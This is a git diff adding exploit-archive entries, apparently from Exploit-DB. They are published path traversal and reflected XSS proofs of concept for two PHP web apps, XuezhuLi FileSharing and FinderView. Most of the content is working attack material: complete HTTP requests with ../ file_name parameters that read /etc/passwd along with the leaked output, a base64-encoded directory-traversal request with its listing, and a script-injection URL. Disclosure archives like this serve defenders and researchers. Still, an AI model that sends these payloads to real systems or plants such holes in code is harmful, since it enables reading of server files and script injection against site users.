a/platforms/php/webapps/40009.txt b/platforms/php/webapps/40009.txt new file mode 100755 index 000000000..785565277 --- /dev/null +++ b/platforms/php/webapps/40009.txt @@ -0,0 +1,57 @@ +# Exploit Title: XuezhuLi FileSharing - Path Traversal Vulnerability +# Date: 2016-06-23 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/XuezhuLi +# Software Link: https://github.com/XuezhuLi/FileSharing/archive/master.zip +# Version: Latest commit +# Tested on: Debian [wheezy] + +### Vulnerability + 1. download.php -> file_name parameter + 2. viewing.php -> file_name parameter + +### Vulnerability 1 - download.php +GET /vul_test/FileSharing/download.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php +Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1 +Connection: keep-alive + +HTTP/1.1 200 OK +Date: Thu, 23 Jun 2016 06:17:58 GMT +..snip.. +Content-Type: application/octet-stream + + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin +sys:x:3:3:sys:/dev:/usr/sbin/nologin +sync:x:4:65534:sync:/bin:/bin/sync + +# ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- ---- +### Vulnerability 2 - viewing.php +GET /vul_test/FileSharing/viewing.php?file_name=../../../../../../../../../../../../../etc/passwd HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://127.0.0.1/vul_test/FileSharing/userpage.php +Cookie: W2=dgf6v5tn2ea8uitvk98m2tfjl7; __utma=96992031.1679083892.1466384142.1466384142.1466398535.2; __utmz=96992031.1466384142.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __atuvc=1%7C25; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1466565345; bdshare_firstime=1466565462740; PHPSESSID=uetimns4scbtk46c8m6ab7upp1 +Connection: keep-alive + +HTTP/1.1 200 OK +Date: Thu, 23 Jun 2016 06:19:49 GMT +Server: Apache/2.4.10 (Ubuntu) +..snip.. +Content-Type: text/plain;charset=UTF-8 + +root:x:0:0:root:/root:/bin/bash +daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin +bin:x:2:2:bin:/bin:/usr/sbin/nologin diff --git a/platforms/php/webapps/40010.html b/platforms/php/webapps/40010.html new file mode 100755 index 000000000..dc424d04e --- /dev/null +++ b/platforms/php/webapps/40010.html @@ -0,0 +1,27 @@ + + +
+ + + + +
+ + + + \ No newline at end of file diff --git a/platforms/php/webapps/40011.txt b/platforms/php/webapps/40011.txt new file mode 100755 index 000000000..231fe950d --- /dev/null +++ b/platforms/php/webapps/40011.txt @@ -0,0 +1,23 @@ +# Exploit Title: FinderView - Multiple Vulnerability(Path Traversal/Reflected XSS) +# Date: 2016-06-23 +# Exploit Author: HaHwul +# Exploit Author Blog: www.hahwul.com +# Vendor Homepage: https://github.com/proin/ +# Software Link: https://github.com/proin/FinderView/archive/master.zip +# Version: Latest commit +# Tested on: Debian [wheezy] + +### Vulnerability1 - Path Traversal(view directory) +Request +GET /vul_test/FinderView/api.php?callback=jQuery21107685743998649676_1466662516225&type=get&mode=0&folder=Li4vLi4vLi4vLi4vLi4vLi4vZXRjLw==&_=1466662516227 HTTP/1.1 +Host: 127.0.0.1 +..snip.. +Connection: keep-alive + +Response +jQuery21107685743998649676_1466662516225([{"folders":[{"name":"backups","folderuri":"Li4vLi4vLi4vLi4vYmFja3Vwcw==","folderuri_nobase":"../../../../backups","size":"0.0 KB","date":"15 June 2016"}, +..snip.. +,{"name":"opt","folderuri":"Li4vLi4vLi4vLi4vb3B0","folderuri_nobase":"../../../../opt","size":"0.0 KB","date":"26 August 2015"},{"name":"run","folderuri":"Li4vLi4vLi4vLi4vcnVu","folderuri_nobase":"../../../../run","size":"0.0 KB","date":"23 June 2016"},{"name":"spool","folderuri":"Li4vLi4vLi4vLi4vc3Bvb2w=","folderuri_nobase":"../../../../spool","size":"0.0 KB","date":"26 August 2015"},{"name":"tmp","folderuri":"Li4vLi4vLi4vLi4vdG1w","folderuri_nobase":"../../../../tmp","size":"0.0 KB","date":"23 June 2016"},{"name":"www","folderuri":"Li4vLi4vLi4vLi4vd3d3","folderuri_nobase":"../../../../www","size":"0.0 KB","date":"22 January + +### Vulnerability2 - Reflected XSS +http://127.0.0.1/vul_test/FinderView/api.php?callback=jQuery211027821724654516156_1466662510279}}1c027%3Cscript%3Ealert%281%29%3C%2fscript%3Ecf2ea&type=get&mode=0&_=1466662510280 diff --git a/platforms/php/webapps/9387.tx b/platforms/php/webapps/9387.txt similarity index 100% rename from platforms/php/webapps/9387.tx rename to platforms/php/webapps/9387.txt diff --git a/platforms/windows/dos/15444.zip b/platforms/windows/dos/15444.txt similarity index 100% rename from platforms/windows/dos/15444.zip rename to platforms/windows/dos/15444.txt